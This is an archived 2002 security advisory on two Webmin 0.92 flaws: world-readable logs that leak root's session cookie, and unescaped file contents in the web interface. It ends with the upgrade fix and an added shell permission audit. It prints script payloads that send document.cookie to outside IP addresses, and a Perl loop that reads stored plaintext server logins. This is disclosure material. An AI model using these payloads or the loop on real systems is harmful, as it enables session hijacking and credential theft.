Local webmin root access
21st Mar 2002 [SBWID-5197]
COMMAND

	Local webmin root access

SYSTEMS AFFECTED

	 version 0.92 affected. 

	 Corrected in 0.93.

PROBLEM

	advisory@prophecy.net.nz found two bugs regarding Webmin, a web
	management tool:
	

	 Problem #1:

	 -----------

	

	Version 0.92-1 of Webmin (when installed by rpm) leaves insecure
	permissions on the /var/webmin directory. This means that if command
	logging within Webmin is enabled, any local user can read the
	/var/webmin/webmin.log file and retrieve the root user's sid (cookie
	session id). It is then trivial to create a faked local cookie using
	this session id and log directly into Webmin as root.
	

	

	 Problem #2:

	 -----------

	

	If a semi-trusted colleague is given a restricted level of access to
	some Webmin functions, specifically sendmail, then malicious code can
	be inserted into certain files that would result in revealing root's
	Webmin sid (cookie session id) when the root user visits the related
	page in Webmin.
	

	

	 Example Exploit:

	 ----------------

	

	Insert the following line into the virtusers file, and wait for the
	root user to visit that page:
	

	</tt></a></td><tt><td><script>/* */document.write('<img
	src="http://192.168.40.1/'+document.cookie+'">');</script>

	

	

	Or the following into the /etc/aliases file:
	

	</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:
	*/+zz+'src="http://10.1.1.33/'+document.cookie+'">');</script>

	

	

	Potentially more likely to be exploited, however, would be a malicious
	local user who has _no_ access to Webmin, who could change a file that
	Webmin views through the HTML interface (where the content being read
	in is not checked for HTML). An example would be changing their 'real
	name' in /etc/passwd to be something along the lines of:
	

	<script>zz=unescape("%3A");document.write('<img
	src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>

	

	(chfn doesn't let you specify a username this long, but you get the
	idea.)
	

	The same problem exists in most parts of Webmin where files (or
	command output such as 'ps') are read in and displayed in the web
	interface.
	

	 Update (25 March 2002)

	 ======

	

	Ed [ekg@tricity.wsu.edu] adds :
	

	as a small addendum to this advisory, we noticed some similar file
	permission problems in /etc/webmin/servers/, in our local webmin
	installation. we were using webmin-0.92-1, noarch RPM version. this
	problem was reported to Jamie last month and is fixed in webmin 0.93.
	

	this problem could allow a local user to read the webmin user passwords
	for remote hosts running webmin, configured under the 'webmin' >>
	'webmin servers' >> 'edit server' page. this is a problem only if
	we enter the login information for a server, so as to enable
	auto-login, and thus, could lead to 'root' or 'admin' access (on
	the remote webmin server) if we are using the cluster users, groups, or
	packages feature of webmin.
	

	the username and password are stored, in plaintext, with the rest of
	the host information in /etc/webmin/servers/${time}.serv, where ${time}
	is the time that the remote server was first discovered by the local
	webmin, measured as a number of seconds since the epoch.
	/etc/webmin/servers has the search bit enabled, but not the read bit.
	therefore we can read the server information files by searching
	backwards from the current time, e.g.:
	

	#!/usr/bin/perl
	#read server info files by stepping backwards from current time
	print STDERR "looking for server info from /etc/webmin/servers, press ^c to end\n";
	for ($tstamp= time(); $tstamp > 0; $tstamp--) {
	  open (SERVINFO, "</etc/webmin/servers/$tstamp.serv") or next;
	  print "contents of /etc/webmin/servers/$tstamp.serv:\n";
	  print <SERVINFO>;
	  close SERVINFO or die "error detected on file close";
	}

	

SOLUTION

	Upgrade to the latest version of Webmin (0.93), which fixes these
	issues (as well as a couple of others apparently).
	

	Available from:
	

	http://www.webmin.com/download.html
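
	A check for the permission problems described in this advisory, as an
	added example that is not part of the original advisory or of Webmin:
	it reports when /var/webmin, /etc/webmin/servers, webmin.log or any
	.serv file is accessible to other users. The function names and the
	optional ROOT prefix argument are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit the Webmin paths named in the advisory for access by
# "other" users. audit_webmin_perms and its ROOT argument are hypothetical
# names; ROOT lets the check run against a copy or a test tree.
# Usage: audit_webmin_perms          (live system)
#        audit_webmin_perms /mnt/img (mounted image or test tree)

# Print the path if any of the r/w/x bits for "other" is set on it.
other_can_access() {
    find "$1" -prune \( -perm -004 -o -perm -002 -o -perm -001 \) -print 2>/dev/null
}

# Print one finding per line; return 1 if anything was found, 0 otherwise.
audit_webmin_perms() {
    root=${1:-}
    found=0
    # Directories: even search-only (--x) access lets a local user open
    # files whose names can be guessed, as with the epoch-named .serv files.
    for d in "$root/var/webmin" "$root/etc/webmin/servers"; do
        [ -d "$d" ] || continue
        if [ -n "$(other_can_access "$d")" ]; then
            echo "DIR  $d is accessible to other users"
            found=1
        fi
    done
    # Files holding session ids (webmin.log) or stored logins (*.serv).
    for f in "$root/var/webmin/webmin.log" "$root"/etc/webmin/servers/*.serv; do
        [ -f "$f" ] || continue
        if [ -n "$(find "$f" -prune -perm -004 -print 2>/dev/null)" ]; then
            echo "FILE $f is world-readable"
            found=1
        fi
    done
    return "$found"
}
```

	Run it as root so that .serv files inside a directory without the read
	bit are still matched by the glob.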

	
